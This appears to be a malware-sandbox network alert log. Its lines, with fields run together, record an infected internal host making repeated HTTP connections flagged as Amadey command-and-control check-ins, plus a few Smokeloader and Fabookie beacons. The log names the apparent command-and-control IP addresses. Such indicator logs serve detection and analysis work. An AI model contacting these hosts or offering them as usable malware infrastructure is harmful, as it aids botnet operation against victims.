                                                                                                                                                                                    192.168.2.445.66.230.12350458802027700 01/05/23-09:00:30.170957TCP2027700ET TROJAN Amadey CnC Check-In5045880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350330802027700 01/05/23-09:00:16.062133TCP2027700ET TROJAN Amadey CnC Check-In5033080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950053802027700 01/05/23-08:59:43.898325TCP2027700ET TROJAN Amadey CnC Check-In5005380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350453802027700 01/05/23-09:00:29.568259TCP2027700ET TROJAN Amadey CnC Check-In5045380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950058802027700 01/05/23-08:59:44.753927TCP2027700ET TROJAN Amadey CnC Check-In5005880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950467802027700 01/05/23-09:00:31.427874TCP2027700ET TROJAN Amadey CnC Check-In5046780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350615802027700 01/05/23-09:00:46.436404TCP2027700ET TROJAN Amadey CnC Check-In5061580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.32.200.11350811802027700 01/05/23-09:01:06.359671TCP2027700ET TROJAN Amadey CnC Check-In5081180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350396802027700 01/05/23-09:00:23.706162TCP2027700ET TROJAN Amadey CnC Check-In5039680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350044802027700 01/05/23-08:59:42.615594TCP2027700ET TROJAN Amadey CnC Check-In5004480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949926802027700 01/05/23-08:59:15.791384TCP2027700ET TROJAN Amadey CnC Check-In4992680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.4222.236.49.12449876802851815 01/05/23-08:59:09.139033TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184987680192.168.2.4222.236.49.124
                                                                                                                                                                                    192.168.2.462.204.41.10949966802027700 01/05/23-08:59:26.148209TCP2027700ET TROJAN Amadey CnC Check-In4996680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350347802027700 01/05/23-09:00:18.136363TCP2027700ET TROJAN Amadey CnC Check-In5034780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350308802027700 01/05/23-09:00:11.627355TCP2027700ET TROJAN Amadey CnC Check-In5030880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950401802027700 01/05/23-09:00:24.007042TCP2027700ET TROJAN Amadey CnC Check-In5040180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950221802027700 01/05/23-09:00:03.152132TCP2027700ET TROJAN Amadey CnC Check-In5022180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349952802027700 01/05/23-08:59:23.562063TCP2027700ET TROJAN Amadey CnC Check-In4995280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949758802027700 01/05/23-08:58:38.567804TCP2027700ET TROJAN Amadey CnC Check-In4975880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350638802027700 01/05/23-09:00:48.603960TCP2027700ET TROJAN Amadey CnC Check-In5063880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950299802027700 01/05/23-09:00:10.577537TCP2027700ET TROJAN Amadey CnC Check-In5029980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950483802027700 01/05/23-09:00:34.965368TCP2027700ET TROJAN Amadey CnC Check-In5048380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950647802027700 01/05/23-09:00:50.385312TCP2027700ET TROJAN Amadey CnC Check-In5064780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350061802027700 01/05/23-08:59:45.236772TCP2027700ET TROJAN Amadey CnC Check-In5006180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950808802027700 01/05/23-09:01:05.963756TCP2027700ET TROJAN Amadey CnC Check-In5080880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950517802027700 01/05/23-09:00:37.849765TCP2027700ET TROJAN Amadey CnC Check-In5051780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950192802027700 01/05/23-09:00:00.204185TCP2027700ET TROJAN Amadey CnC Check-In5019280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949781802027700 01/05/23-08:58:49.356501TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350023802027700 01/05/23-08:59:35.490985TCP2027700ET TROJAN Amadey CnC Check-In5002380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950037802027700 01/05/23-08:59:41.840768TCP2027700ET TROJAN Amadey CnC Check-In5003780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350101802027700 01/05/23-08:59:50.002346TCP2027700ET TROJAN Amadey CnC Check-In5010180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949999802027700 01/05/23-08:59:31.762334TCP2027700ET TROJAN Amadey CnC Check-In4999980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950032802027700 01/05/23-08:59:40.872811TCP2027700ET TROJAN Amadey CnC Check-In5003280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950720802027700 01/05/23-09:00:58.253761TCP2027700ET TROJAN Amadey CnC Check-In5072080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950115802027700 01/05/23-08:59:51.575252TCP2027700ET TROJAN Amadey CnC Check-In5011580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350465802027700 01/05/23-09:00:30.922357TCP2027700ET TROJAN Amadey CnC Check-In5046580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349846802027700 01/05/23-08:59:04.030877TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350113802027700 01/05/23-08:59:51.349297TCP2027700ET TROJAN Amadey CnC Check-In5011380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350122802027700 01/05/23-08:59:52.258206TCP2027700ET TROJAN Amadey CnC Check-In5012280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949765802027700 01/05/23-08:58:40.524108TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950164802027700 01/05/23-08:59:57.736953TCP2027700ET TROJAN Amadey CnC Check-In5016480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950810802027700 01/05/23-09:01:06.209228TCP2027700ET TROJAN Amadey CnC Check-In5081080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950155802027700 01/05/23-08:59:55.492248TCP2027700ET TROJAN Amadey CnC Check-In5015580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350163802027700 01/05/23-08:59:57.745667TCP2027700ET TROJAN Amadey CnC Check-In5016380192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350342802027700 01/05/23-09:00:17.462633TCP2027700ET TROJAN Amadey CnC Check-In5034280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949888802027700 01/05/23-08:59:10.718152TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350437802027700 01/05/23-09:00:27.511836TCP2027700ET TROJAN Amadey CnC Check-In5043780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950709802027700 01/05/23-09:00:57.338565TCP2027700ET TROJAN Amadey CnC Check-In5070980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950365802027700 01/05/23-09:00:20.472738TCP2027700ET TROJAN Amadey CnC Check-In5036580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350491802027700 01/05/23-09:00:35.341719TCP2027700ET TROJAN Amadey CnC Check-In5049180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949933802027700 01/05/23-08:59:16.543995TCP2027700ET TROJAN Amadey CnC Check-In4993380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350446802027700 01/05/23-09:00:28.538778TCP2027700ET TROJAN Amadey CnC Check-In5044680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350049802027700 01/05/23-08:59:43.341281TCP2027700ET TROJAN Amadey CnC Check-In5004980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350666802027700 01/05/23-09:00:53.231240TCP2027700ET TROJAN Amadey CnC Check-In5066680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949961802027700 01/05/23-08:59:25.029663TCP2027700ET TROJAN Amadey CnC Check-In4996180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350135802027700 01/05/23-08:59:53.659768TCP2027700ET TROJAN Amadey CnC Check-In5013580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950337802027700 01/05/23-09:00:16.961297TCP2027700ET TROJAN Amadey CnC Check-In5033780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949831802027700 01/05/23-08:58:58.157060TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350323802027700 01/05/23-09:00:13.669182TCP2027700ET TROJAN Amadey CnC Check-In5032380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949914802027700 01/05/23-08:59:13.975728TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950533802027700 01/05/23-09:00:39.141241TCP2027700ET TROJAN Amadey CnC Check-In5053380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950746802027700 01/05/23-09:01:00.700179TCP2027700ET TROJAN Amadey CnC Check-In5074680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950041802027700 01/05/23-08:59:42.178829TCP2027700ET TROJAN Amadey CnC Check-In5004180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950384802027700 01/05/23-09:00:22.583512TCP2027700ET TROJAN Amadey CnC Check-In5038480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950793802027700 01/05/23-09:01:04.637334TCP2027700ET TROJAN Amadey CnC Check-In5079380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950441802027700 01/05/23-09:00:27.897047TCP2027700ET TROJAN Amadey CnC Check-In5044180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350240802027700 01/05/23-09:00:04.980795TCP2027700ET TROJAN Amadey CnC Check-In5024080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350583802027700 01/05/23-09:00:43.661148TCP2027700ET TROJAN Amadey CnC Check-In5058380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949822802027700 01/05/23-08:58:55.711340TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350068802027700 01/05/23-08:59:46.545693TCP2027700ET TROJAN Amadey CnC Check-In5006880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350084802027700 01/05/23-08:59:48.213307TCP2027700ET TROJAN Amadey CnC Check-In5008480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350281802027700 01/05/23-09:00:09.024525TCP2027700ET TROJAN Amadey CnC Check-In5028180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350093802027700 01/05/23-08:59:49.254040TCP2027700ET TROJAN Amadey CnC Check-In5009380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949850802027700 01/05/23-08:59:04.854937TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350021802027700 01/05/23-08:59:35.303113TCP2027700ET TROJAN Amadey CnC Check-In5002180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350011802027700 01/05/23-08:59:33.528127TCP2027700ET TROJAN Amadey CnC Check-In5001180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950578802027700 01/05/23-09:00:43.144717TCP2027700ET TROJAN Amadey CnC Check-In5057880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950238802027700 01/05/23-09:00:04.786770TCP2027700ET TROJAN Amadey CnC Check-In5023880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350351802027700 01/05/23-09:00:18.584418TCP2027700ET TROJAN Amadey CnC Check-In5035180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949749802027700 01/05/23-08:58:36.138379TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950108802027700 01/05/23-08:59:50.925854TCP2027700ET TROJAN Amadey CnC Check-In5010880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349862802027700 01/05/23-08:59:07.146602TCP2027700ET TROJAN Amadey CnC Check-In4986280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950368802027700 01/05/23-09:00:20.805880TCP2027700ET TROJAN Amadey CnC Check-In5036880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349992802027700 01/05/23-08:59:30.424541TCP2027700ET TROJAN Amadey CnC Check-In4999280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.4109.102.255.23049958802851815 01/05/23-08:59:24.515311TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184995880192.168.2.4109.102.255.230
                                                                                                                                                                                    192.168.2.462.204.41.10949905802027700 01/05/23-08:59:12.883945TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350742802027700 01/05/23-09:01:00.399584TCP2027700ET TROJAN Amadey CnC Check-In5074280192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.32.200.11350078802027700 01/05/23-08:59:47.799332TCP2027700ET TROJAN Amadey CnC Check-In5007880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950689802027700 01/05/23-09:00:55.573091TCP2027700ET TROJAN Amadey CnC Check-In5068980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350675802027700 01/05/23-09:00:53.969195TCP2027700ET TROJAN Amadey CnC Check-In5067580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949774802027700 01/05/23-08:58:46.360040TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350262802027700 01/05/23-09:00:07.129484TCP2027700ET TROJAN Amadey CnC Check-In5026280192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350462802027700 01/05/23-09:00:30.446487TCP2027700ET TROJAN Amadey CnC Check-In5046280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350205802027700 01/05/23-09:00:01.396939TCP2027700ET TROJAN Amadey CnC Check-In5020580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350193802027700 01/05/23-09:00:00.354878TCP2027700ET TROJAN Amadey CnC Check-In5019380192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950219802027700 01/05/23-09:00:02.860408TCP2027700ET TROJAN Amadey CnC Check-In5021980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949824802027700 01/05/23-08:58:56.317147TCP2027700ET TROJAN Amadey CnC Check-In4982480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350529802027700 01/05/23-09:00:38.776017TCP2027700ET TROJAN Amadey CnC Check-In5052980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350781802027700 01/05/23-09:01:03.812836TCP2027700ET TROJAN Amadey CnC Check-In5078180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949885802027700 01/05/23-08:59:10.188635TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950644802027700 01/05/23-09:00:49.753858TCP2027700ET TROJAN Amadey CnC Check-In5064480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350002802027700 01/05/23-08:59:32.034230TCP2027700ET TROJAN Amadey CnC Check-In5000280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950077802027700 01/05/23-08:59:47.458821TCP2027700ET TROJAN Amadey CnC Check-In5007780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950716802027700 01/05/23-09:00:57.957311TCP2027700ET TROJAN Amadey CnC Check-In5071680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350063802027700 01/05/23-08:59:45.640445TCP2027700ET TROJAN Amadey CnC Check-In5006380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349871802027700 01/05/23-08:59:08.618933TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949919802027700 01/05/23-08:59:14.693362TCP2027700ET TROJAN Amadey CnC Check-In4991980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350725802027700 01/05/23-09:00:58.781214TCP2027700ET TROJAN Amadey CnC Check-In5072580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950443802027700 01/05/23-09:00:28.233595TCP2027700ET TROJAN Amadey CnC Check-In5044380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350667802027700 01/05/23-09:00:53.422304TCP2027700ET TROJAN Amadey CnC Check-In5066780192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350602802027700 01/05/23-09:00:45.014968TCP2027700ET TROJAN Amadey CnC Check-In5060280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950734802027700 01/05/23-09:00:59.805370TCP2027700ET TROJAN Amadey CnC Check-In5073480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350186802027700 01/05/23-08:59:59.609153TCP2027700ET TROJAN Amadey CnC Check-In5018680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350791802027700 01/05/23-09:01:04.523822TCP2027700ET TROJAN Amadey CnC Check-In5079180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350466802027700 01/05/23-09:00:31.441595TCP2027700ET TROJAN Amadey CnC Check-In5046680192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950597802027700 01/05/23-09:00:44.540035TCP2027700ET TROJAN Amadey CnC Check-In5059780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350338802027700 01/05/23-09:00:17.057015TCP2027700ET TROJAN Amadey CnC Check-In5033880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950594802027700 01/05/23-09:00:44.253324TCP2027700ET TROJAN Amadey CnC Check-In5059480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350231802027700 01/05/23-09:00:04.106049TCP2027700ET TROJAN Amadey CnC Check-In5023180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350629802027700 01/05/23-09:00:47.778768TCP2027700ET TROJAN Amadey CnC Check-In5062980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350333802027700 01/05/23-09:00:17.108838TCP2027700ET TROJAN Amadey CnC Check-In5033380192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350580802027700 01/05/23-09:00:43.337556TCP2027700ET TROJAN Amadey CnC Check-In5058080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350004802027700 01/05/23-08:59:32.357390TCP2027700ET TROJAN Amadey CnC Check-In5000480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350096802027700 01/05/23-08:59:49.568203TCP2027700ET TROJAN Amadey CnC Check-In5009680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349936802027700 01/05/23-08:59:17.032116TCP2027700ET TROJAN Amadey CnC Check-In4993680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350552802027700 01/05/23-09:00:40.995877TCP2027700ET TROJAN Amadey CnC Check-In5055280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949801802027700 01/05/23-08:58:52.530673TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950278802027700 01/05/23-09:00:08.599518TCP2027700ET TROJAN Amadey CnC Check-In5027880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350025802027700 01/05/23-08:59:35.998390TCP2027700ET TROJAN Amadey CnC Check-In5002580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350411802027700 01/05/23-09:00:25.070861TCP2027700ET TROJAN Amadey CnC Check-In5041180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350081802027700 01/05/23-08:59:47.974120TCP2027700ET TROJAN Amadey CnC Check-In5008180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950273802027700 01/05/23-09:00:08.080432TCP2027700ET TROJAN Amadey CnC Check-In5027380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350377802027700 01/05/23-09:00:21.862342TCP2027700ET TROJAN Amadey CnC Check-In5037780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350513802027700 01/05/23-09:00:37.458508TCP2027700ET TROJAN Amadey CnC Check-In5051380192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.32.200.11350646802027700 01/05/23-09:00:50.400171TCP2027700ET TROJAN Amadey CnC Check-In5064680192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950777802027700 01/05/23-09:01:03.433856TCP2027700ET TROJAN Amadey CnC Check-In5077780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350366802027700 01/05/23-09:00:20.451845TCP2027700ET TROJAN Amadey CnC Check-In5036680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950599802027700 01/05/23-09:00:44.859960TCP2027700ET TROJAN Amadey CnC Check-In5059980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.159.1849929802851115 01/05/23-08:59:16.604818TCP2851115ETPRO TROJAN Win32/Fabookie.ek CnC Activity M24992980192.168.2.445.66.159.18
                                                                                                                                                                                    192.168.2.445.32.200.11350119802027700 01/05/23-08:59:52.128604TCP2027700ET TROJAN Amadey CnC Check-In5011980192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350236802027700 01/05/23-09:00:04.598812TCP2027700ET TROJAN Amadey CnC Check-In5023680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950275802027700 01/05/23-09:00:08.323545TCP2027700ET TROJAN Amadey CnC Check-In5027580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350349802027700 01/05/23-09:00:18.353498TCP2027700ET TROJAN Amadey CnC Check-In5034980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950642802027700 01/05/23-09:00:48.975083TCP2027700ET TROJAN Amadey CnC Check-In5064280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350042802027700 01/05/23-08:59:42.250950TCP2027700ET TROJAN Amadey CnC Check-In5004280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950749802027700 01/05/23-09:01:00.980269TCP2027700ET TROJAN Amadey CnC Check-In5074980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350261802027700 01/05/23-09:00:06.994802TCP2027700ET TROJAN Amadey CnC Check-In5026180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350657802027700 01/05/23-09:00:52.746938TCP2027700ET TROJAN Amadey CnC Check-In5065780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950464802027700 01/05/23-09:00:30.762088TCP2027700ET TROJAN Amadey CnC Check-In5046480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350114802027700 01/05/23-08:59:51.579866TCP2027700ET TROJAN Amadey CnC Check-In5011480192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.32.200.11350322802027700 01/05/23-09:00:13.868410TCP2027700ET TROJAN Amadey CnC Check-In5032280192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950067802027700 01/05/23-08:59:46.015861TCP2027700ET TROJAN Amadey CnC Check-In5006780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949834802027700 01/05/23-08:58:59.728507TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950280802027700 01/05/23-09:00:08.893095TCP2027700ET TROJAN Amadey CnC Check-In5028080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950418802027700 01/05/23-09:00:25.641858TCP2027700ET TROJAN Amadey CnC Check-In5041880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949750802027700 01/05/23-08:58:36.660126TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350165802027700 01/05/23-08:59:57.736479TCP2027700ET TROJAN Amadey CnC Check-In5016580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950173802027700 01/05/23-08:59:58.308479TCP2027700ET TROJAN Amadey CnC Check-In5017380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950614802027700 01/05/23-09:00:46.253642TCP2027700ET TROJAN Amadey CnC Check-In5061480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350226802027700 01/05/23-09:00:03.668077TCP2027700ET TROJAN Amadey CnC Check-In5022680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349898802027700 01/05/23-08:59:12.017608TCP2027700ET TROJAN Amadey CnC Check-In4989880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350600802027700 01/05/23-09:00:44.794855TCP2027700ET TROJAN Amadey CnC Check-In5060080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350756802027700 01/05/23-09:01:01.788290TCP2027700ET TROJAN Amadey CnC Check-In5075680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350422802027700 01/05/23-09:00:25.959546TCP2027700ET TROJAN Amadey CnC Check-In5042280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350735802027700 01/05/23-09:00:59.898829TCP2027700ET TROJAN Amadey CnC Check-In5073580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12349892802027700 01/05/23-08:59:11.451593TCP2027700ET TROJAN Amadey CnC Check-In4989280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350282802027700 01/05/23-09:00:08.948723TCP2027700ET TROJAN Amadey CnC Check-In5028280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350109802027700 01/05/23-08:59:50.885789TCP2027700ET TROJAN Amadey CnC Check-In5010980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350086802027700 01/05/23-08:59:48.578736TCP2027700ET TROJAN Amadey CnC Check-In5008680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350590802027700 01/05/23-09:00:43.905547TCP2027700ET TROJAN Amadey CnC Check-In5059080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949985802027700 01/05/23-08:59:29.521467TCP2027700ET TROJAN Amadey CnC Check-In4998580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350099802027700 01/05/23-08:59:50.050454TCP2027700ET TROJAN Amadey CnC Check-In5009980192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949855802027700 01/05/23-08:59:05.861340TCP2027700ET TROJAN Amadey CnC Check-In4985580192.168.2.462.204.41.109
